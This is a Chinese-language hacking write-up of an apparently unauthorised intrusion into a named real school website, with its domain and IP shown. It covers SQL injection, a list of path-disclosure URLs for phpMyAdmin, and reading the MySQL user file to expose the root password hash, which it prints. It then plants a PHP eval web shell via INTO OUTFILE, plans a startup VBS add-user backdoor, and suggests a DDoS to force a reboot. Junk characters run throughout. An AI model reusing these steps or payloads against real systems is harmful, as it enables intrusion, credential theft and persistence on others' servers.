友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
9 _$ @% b: s. l3 e* h. S发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！



常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

2 }) x( R, |- p那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
- c: L/ {7 W, \; p2 b8 a3 H
% q7 w3 J3 P9 c, _) s& V试着爆绝对路径：
9 Z* k) a$ G! Q1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
6 D6 C0 E3 o/ z# k& l. U5./phpmyadmin/libraries/select_lang.lib.php  
, a/ t$ X; l( s3 x6./phpmyadmin/libraries/lect_lang.lib.php  
3 H9 |/ W  f, V# X) D: A+ J: n8 p7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  
8 k' D& z- S; v3 e1 L
% G# O) l" e+ d7 u) F; ?均不行...........................
4 n; b; L' w8 O8 F, y, e
御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
2 N6 O( {. G7 f1 G
权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

' i3 x- _$ Z  t, p. i2 P/ |敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

1 c- B+ q5 u, n1 v! o7 [* P% I8 M自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
3 z7 r9 z( L7 Q/ J3 C; w
; U' ^6 t" M$ M* ^  o成功读到root密码：

17---- r(0072)
6 B  z- Q1 \* X. b& o" V18---- o(006f)
. D) z1 _. O, t/ v$ w! B19---- o(006f)
20---- t(0074)
6 ~3 @! z% G. c3 D21---- *(002a)
22---- 8(0038)
23---- 2(0032)
0 P' Z+ y& y% N/ X24---- E(0045)
; R8 B8 g3 y5 J0 e' u2 U25---- 1(0031)
+ U2 M, h* M8 I; s& G% `; g26---- C(0043)
0 ^( x( Y4 J) a. s) Q27---- 5(0035)
28---- 8(0038)
29---- 2(0032)
1 v8 `( }7 {* T, _5 S30---- 8(0038)
/ g+ X3 \! N- ~& O& J& H31---- A(0041)
9 c2 t) @8 n/ N: n' J32---- 9(0039)
33---- B(0042)
! M0 O6 h5 _( i+ m- @4 O1 n34---- 5(0035)
! F! `- l5 ~! E- v# C35---- 4(0034)
$ {1 Z7 z4 i6 w3 I( @36---- 8(0038)
& L$ T/ ]0 ]; k37---- 6(0036)
8 E9 w& D6 Y! c38---- 4(0034)
' u4 J: Y4 n! o! Z/ i39---- 9(0039)
40---- 1(0031)
& i% Q! b- ?3 t+ @3 W+ R41---- 1(0031)
42---- 5(0035)
$ o5 y& N# z2 s7 {8 C1 X% T4 ^43---- 3(0033)
44---- 5(0035)
+ K1 X. c# \. f3 ?  i6 B45---- 9(0039)
46---- 8(0038)
0 [% ]7 V7 n6 O' e( a" y5 H47---- F(0046)
* R$ e! p& [7 \! K7 U& G  k48---- F(0046)
49---- 4(0034)
5 X% |* d! b9 t/ o50---- F(0046)
& C9 u0 y. I$ e( R51---- 0(0030)
52---- 3(0033)
53---- 2(0032)
" L5 W2 k" x' _# j- z8 e* f54---- A(0041)
' d1 l2 [3 @5 O, q7 @( X7 x55---- 4(0034)
1 h" O2 R1 @. r5 Q8 y, }56---- A(0041)
57---- B(0042)
4 w# S# ?$ z0 h2 F, d58---- *(0044)
59---- *(0035)
60---- *(0041)
3 Y( e! C5 u* I6 b. S, |1 G8 ]5 Y61---- *0032)
0 ^4 T- F  r7 l4 P1 u3 T
  W9 m! H3 m; Z7 k4 O解密后成功登陆phpmyamin
, b6 X) d' i- U0 G% _                          

( f: Q/ w/ w( a1 ~7 }* |                             
) W% D( S" T! \, x, _0 ]1 Y
: ^. @8 I9 Q7 s" o, X0 V! n找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
! |* C& W( K4 @' q5 m7 y; C$ C
成功执行，拿下shell，菜刀连接：
) O; [2 l: M6 g$ i* S8 a7 a( Z: l
服务器不支持asp,aspx,php提权无果...................

但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
& A- J* D0 Q/ w

服务器上已经有个隐藏帐号了

别名     administrators
3 ?7 t* `/ H% G9 t( g+ M注释     管理员对计算机/域有不受限制的完全访问权

6 @4 t" O4 i2 s# n

成员

" Y) g2 J" ]: s" r+ S; \/ b

-------------------------------------------------------------------------------
2 D# b$ ]% c) F" qadmin
Administrator
8 v  p& n' r  @) Lslipper$
; a- x! x* p8 g2 `  o5 j; Bsqluser
命令成功完成。

8 H, b! ?( E. c4 u服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

ddos服务器重启，不然就只能坐等服务器重启了...............................

      

' m3 j' b6 d& _, A; `

angel